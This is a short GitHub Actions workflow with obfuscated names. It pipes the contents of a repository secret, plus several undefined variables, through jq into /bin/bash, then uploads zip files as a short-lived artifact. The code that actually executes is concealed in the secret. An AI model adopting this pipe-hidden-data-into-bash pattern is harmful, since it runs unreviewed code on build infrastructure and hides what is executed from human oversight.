name: jiuzhelijun
on:
  workflow_dispatch:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jiuzhelijun
        env:
          ubpbj974: ${{ secrets.ubpbj974 }}
        run: |
          printf '%s' "$ubpbj974" | jq -r .tloe8172 | /bin/bash
          printf '%s' "$rcx96425" | jq -r .ibqhz44355 | /bin/bash
          echo $bul61 | jq -r .ye5 | /bin/bash
          echo $e1572 | jq -r .rx03791 | /bin/bash
          echo $bb70 | jq -r .db59609 | /bin/bash
          echo $byl7 | jq -r .m68 | /bin/bash
          echo $mk4 | jq -r .x5 | /bin/bash
          printf '%s' "$kll58" | jq -r .zl5430 | /bin/bash
          echo $t962 | jq -r .lhrm5 | /bin/bash
          echo $qh333 | jq -r .hxqvj497 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: dBJFMCOi
          path: "*.zip"
          retention-days: 1
